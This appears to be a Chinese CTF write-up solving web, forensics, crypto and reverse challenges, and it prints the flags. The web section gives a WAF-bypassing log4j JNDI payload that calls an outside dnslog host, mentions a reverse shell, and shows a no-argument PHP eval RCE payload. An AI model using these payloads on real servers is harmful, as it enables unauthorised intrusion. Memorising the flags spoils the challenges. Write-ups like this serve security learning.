本文已参与「新人创作礼」 活动,一 起开启掘金创作之路。
Web
shiro?
很明显不是一般的shiro,很多命令都不能用,又是Sprintboot框架,那可以尝试log4j RCE
发现存在WAF检测,bypass测试绕过:${${::-j}ndi:rmi://r5qm53.dnslog.cn/exp}
成功返回dnslog解析记录
搭建服务直接打,反弹shell
flag{314ace018a6f243357c5b84d030af604}
RCE_No_Para
1
<?php
2
if(';' === preg_replace('/[^\W]+((?R)?)/', '', $_GET['code'])) {
3
if(!preg_match('/session|end|next|header|dir/i',$_GET['code'])){
4
eval($_GET['code']);
5
}else{
6
die("Hacker!");
7
}
8
}else{
9
show_source(__FILE__);
10
}
11
?>
无参RCE
?a=system('whoami');&code=eval(pos(pos(get_defined_vars())));
Flag配送中心
是一个CVE漏洞:参考:HTTPoxy漏洞(CVE-2016-5385)
Misc
迷宫
从入口走到出口,然后路上碰到的字连起来取拼音即可 经过的字为:战长恙长战恙河长山山安战疫疫战疫安疫长安恙 flag:
1
cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}
朴实无华的取证
查看一下运行程序
过滤查看有哪些txt文件
取出可疑
txt文件
继续查找
zip文件 提取类似flag压缩包
存在加密,使用前面txt里面的日期:
20211209尝试解密 得出hint:
1
//幼儿园水平的加密(部分)
2
void Encrypt(string& str)
3
{
4
for(int i = 0; i < str.length(); i++)
5
{
6
if(str[i] >='a'&& str[i]<='w')
7
str[i]+=3;
8
else if(str[i]=='x')
9
str[i]='a';
10
else if(str[i]=='y')
11
str[i]='b';
12
else if(str[i]=='z')
13
str[i]='c';
14
else if(str[i]=='_')
15
str[i]='|';
16
str[i] -= 32;
17
}
18
}
继续查看有无可疑图片文件 提取出来
得到一串密文,根据之前的得到的处理密文逻辑,简单使用Python逆推下即可得到flag
1
flag_str = "FDCB[8LDQ?ZLOO?FHUWDLQOB?VXFFHHG?LQ?ILJKWLQJ?WKH?HSLGHPLF]"
2
flag_str = list(flag_str)
3
for i in range(len(flag_str)):
4
flag_str[i] = chr(ord(flag_str[i]) + 32)
5
if ord(flag_str[i]) >= ord('a') + 3 and ord(flag_str[i]) <= ord('w') + 3:
6
flag_str[i] = chr(ord(flag_str[i]) - 3)
7
elif flag_str[i] == 'a':
8
flag_str[i] = 'x'
9
elif flag_str[i] == 'b':
10
flag_str[i] = 'y'
11
elif flag_str[i] == 'c':
12
flag_str[i] = 'z'
13
elif flag_str[i] == '|':
14
flag_str[i] = '_'
15
print(flag_str[i],end="")
无字天书
打开secret.pcap,导出http对象列表
在1(3).php中发现504b开头一段16进制数据 取出来,简单的用python脚本处理一下,生成zip压缩包
1
from binascii import *
2
3
hex_code = '504B0304140008000800B16A98530000000000000000E201000008002000666C61672E74787455540D0007DF58C561B564C561B364C56175780B000104F5010000041400000065904112C0200803CFC92BF8FF2B6BD1E242BD6464D624A8D84747C4BB8EC8E2107C719CBA8C1A95223A58C811B11B1E8955BB913B9F441558B06872899C39D8E5D06DC325E62F7C4BC1F0078E6DBB251FBB9037586311D367846B1471871896A01F504B0708BB2C9F9162000000E2010000504B0304140008000800396998530000000000000000F4000000060020006B65792E777355540D00071F56C561B564C561B364C56175780B000104F501000004140000007D8EC10900300803DF11DCE1F69FB25A3FDAD22A0A1E21111012E02637B2E20CA0066A4F454C576CF2F3A8981FA83514693B533852AEC7D0DBC32D7B01504B07087FB167453D000000F4000000504B03041400080008003969985300000000000000000D010000110020005F5F4D41434F53582F2E5F6B65792E777355540D00071F56C561B564C561CF6CC56175780B000104F501000004140000006360156367606260F04D4C56F00F568850800290180327101B01F16D2006F219791988028E212141101658C70120F64553C20415176060904ACECFD54B2C28C849D5CB492C2E292D4E4D49492C49550E0886AABD00C4B60C0CA2087585A589458979259979A90CF2614713910D2ED43730B030B436334C3635353648B176CB2C4A4DCBAFB07672B5B030377034D075347375D2353103B22C5C2C0D758D0C0C0C5D8C1C4D2C5C0C8C1800504B0708B1276E0CAA0000000D010000504B01021403140008000800B16A9853BB2C9F9162000000E2010000080020000000000000000000A48100000000666C61672E74787455540D0007DF58C561B564C561B364C56175780B000104F50100000414000000504B01021403140008000800396998537FB167453D000000F4000000060020000000000000000000A481B80000006B65792E777355540D00071F56C561B564C561B364C56175780B000104F50100000414000000504B0102140314000800080039699853B1276E0CAA0000000D010000110020000000000000000000A481490100005F5F4D41434F53582F2E5F6B65792E777355540D00071F56C561B564C561CF6CC56175780B000104F50100000414000000504B05060000000003000300090100005202000000003b29e6e57725'
4
with open('123.zip','wb') as f:
5
f.write(unhexlify(hex_code))
6
f.close()
解压压缩包得到flag.txt以及key.ws key.ws明显是whitespace 找个在线网站处理一下vii5ard.github.io/whitespace/ 得到key: XiAnWillBeSafe flag.txt则是snow隐写,直接上工具解密
flag:
1
cazy{C4n_y0u_underSt4nd_th3_b0oK_With0ut_Str1ng}
####xian加油
打开流量包,追踪tcp流,发现是一个目录扫描的流量 查看各个流的数据,发现只有3个http状态码是200 ok,分别是hint.txt secret.txt
ds_store
其中,hint.txt为base32编码,解码得到
secret.txt内容base64解码一下,是一个zip压缩包
解压得到包含flag的图片 
7
num_string = base64.b64decode(accsi_str)
8
qrcode = str(num_string).replace(r'\n','').replace('b','').replace("'",'')
9
print(qrcode)
得到一串2进制数据
1
0000000101110000000011111101110000000011111010110101011111000111011011111001000101000011110001110101101101000100100010110000011000111000001010100010010001011101101100110110101111010001001111101011101000000010010000101111100000000101010101010101010101010000000111111110010000000010011001111111111111000101010100001011111101000000110000101101000110010010000100110101011101101100000100111100110001101000001001011101111111100101011010001101010111001010110001110000000110100000000000010011010100100010001101110101110111110100101001001111111011100001100101000100010001101110110110011001100110011101111010011000111111101101001100000001000001110101000111000001011011111101111101100110101101001100010100110000100010100100111100100000100111001001011101010100110001110001100100000101010001001101111101110110010011111101011101110110001011100000010111011000101101000110010001111011000111101001001111010101000001110101110110101111110100010010101101100100100000011010001001111101101000100011100101100110111110011000111001111100000010110110111001111100010011001011001010001011101100000000011111111010110011100111001010111010110000000111000111011010110001010100100011111011100110101011010110001110111101000101001100001100110100000000000100100010101111101100011111111110100111010001010110111111110000001010101011001111101111110001011010011110001101100000000111111011110110000000100011000
用Python简单处理一下,将2进制数据转成二维码
1
import base64
2
from PIL import Image
3
4
accsi_num_list = [77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 86, 120, 117, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 65, 120, 77, 70, 120, 117, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 70, 120, 117, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 65, 120, 77, 68, 65, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 86, 120, 117, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 119, 77, 70, 120, 117, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 65, 120, 77, 84, 65, 120, 77, 70, 120, 117, 77, 68, 65, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 68, 69, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 86, 120, 117, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 120, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 84, 69, 119, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 86, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 69, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 65, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 65, 61, 61]
5
accsi_str = ''
6
for i in accsi_num_list:
7
accsi_str += chr(i)
8
num_string = base64.b64decode(accsi_str)
9
qrcode = str(num_string).replace(r'\n','').replace('b','').replace("'",'')
10
print(qrcode)
11
MAX = int(len(qrcode)**(1/2))
12
pic = Image.new("RGB",(MAX, MAX))
13
i=0
14
for y in range (0,MAX):
15
for x in range (0,MAX):
16
if(qrcode[i] == '0'):
17
pic.putpixel([x,y],(0, 0, 0))
18
else:
19
pic.putpixel([x,y],(255,255,255))
20
i = i+1
21
22
pic.save('binary_flag.png')
扫描一下二维码得到 flag:
1
flag{932b2c0070e4897ea7df0190dbf36ece}
Crypto
no_cry_no_bb
题目内容
1
assert flag[:5] ==b'cazy{'
2
3
def pad(m):
4
tmp = 16-(len(m)%16)
5
return m + bytes([tmp for _ in range(tmp)])
6
7
def encrypt(m,key):
8
aes = AES.new(key,AES.MODE_ECB)
9
return aes.encrypt(m)
10
11
if __name__ == "__main__":
12
flag = pad(flag)
13
key = pad(long_to_bytes(random.randrange(1,1<<20)))
14
c = encrypt(flag,key)
15
print(c)
16
# b'\x9d\x18K\x84n\xb8b|\x18\xad4\xc6\xfc\xec\xfe\x14\x0b_T\xe3\x1b\x03Q\x96e\x9e\xb8MQ\xd5\xc3\x1c'
看一下代码,大抵在范围(1,1<<20)取一个随机数在经过pad()方法作为key进行aes加密 解题方法没啥好说的,就是去爆破加密时所取得随机数再aes解密,最后判断一下解密后得明文是否存在cazy{即可
1
from Crypto.Util.number import *
2
from Crypto.Cipher import AES
3
import random
4
def pad(m):
5
tmp = 16-(len(m)%16)
6
return m + bytes([tmp for _ in range(tmp)])
7
8
def decrypt(c,key):
9
aes = AES.new(key,AES.MODE_ECB)
10
return aes.decrypt(c)
11
12
if __name__ == '__main__':
13
c = b'\x9d\x18K\x84n\xb8b|\x18\xad4\xc6\xfc\xec\xfe\x14\x0b_T\xe3\x1b\x03Q\x96e\x9e\xb8MQ\xd5\xc3\x1c'
14
while True:
15
key = pad(long_to_bytes(random.randrange(1,1<<20)))
16
flag = decrypt(c,key)
17
if 'cazy{' in str(flag):
18
print(flag)
19
break
flag:
1
cazy{n0_c4n,bb?n0p3!}
no_cry_no_can
题目内容
1
flag = cazy{xxxxxxxxxxx}
2
assert len(key) <= 5
3
assert flag[:5] == b'cazy{'
4
def can_encrypt(flag,key):
5
block_len = len(flag) // len(key) + 1
6
new_key = key * block_len
7
return bytes([i^j for i,j in zip(flag,new_key)])
8
9
c = can_encrypt(flag,key)
10
print(c)
11
12
# b'<pH\x86\x1a&"m\xce\x12\x00pm\x97U1uA\xcf\x0c:NP\xcf\x18~l'
13
密文是做异或得到得结果,所以我们通过给定的flag格式cazy{获取到key即可,再用得到的key对密文做异或即可得到flag
1
c = b'<pH\x86\x1a&"m\xce\x12\x00pm\x97U1uA\xcf\x0c:NP\xcf\x18~l'
2
b = b'cazy{'
3
key = bytes([i^j for i,j in zip(c,b)])
4
block_len = len(c)//len(key)+1
5
new_key = key * block_len
6
flag = bytes([i^j for i,j in zip(c,new_key)])
7
print(flag)
flag:
1
cazy{y3_1s_a_h4nds0me_b0y!}
no_math_no_cry
题目内容
1
from Crypto.Util.number import*
2
from secret import flag
3
4
assert len(flag) <= 80
5
def sec_encry(m):
6
cip = (m - (1<<500))**2 + 0x0338470
7
return cip
8
9
if __name__ == "__main__":
10
m = bytes_to_long(flag)
11
c = sec_encry(m)
12
print(c)
13
14
# 10715086071862673209484250490600018105614048117055336074437503883703510511248211671489145400471130049712947188505612184220711949974689275316345656079538583389095869818942817127245278601695124271626668045250476877726638182396614587807925457735428719972874944279172128411500209111406507112585996098530169
15
纯粹的数学计算问题,直接根据加密方式逆着解就ok
1
c = 10715086071862673209484250490600018105614048117055336074437503883703510511248211671489145400471130049712947188505612184220711949974689275316345656079538583389095869818942817127245278601695124271626668045250476877726638182396614587807925457735428719972874944279172128411500209111406507112585996098530169
2
b = int('0x0338470',16)
3
m1 = gmpy2.iroot(c-b,2)[0]
4
m1 = -m1
5
m = m1 + (1<<500)
6
print(long_to_bytes(m))
flag:
1
cazy{1234567890_no_m4th_n0_cRy}
Reverse
combat_slogan
下载文件,是一个jar包,直接用jdgui打开 在main中发现字符串,Jr_j11y_s1tug_g0_raq_g0_raq_pnml 凯撒全位移一下 flag:
1
flag{We_w11l_f1ght_t0_end_t0_end_cazy}
cute_doge
下载文件,ctf1.exe,用ida打开,查看字符串
发现可疑字符串
ZmxhZ3tDaDFuYV95eWRzX2Nhenl9 base家族解密,发现是Base64 flag:
1
flag{Ch1na_yyds_cazy}
\
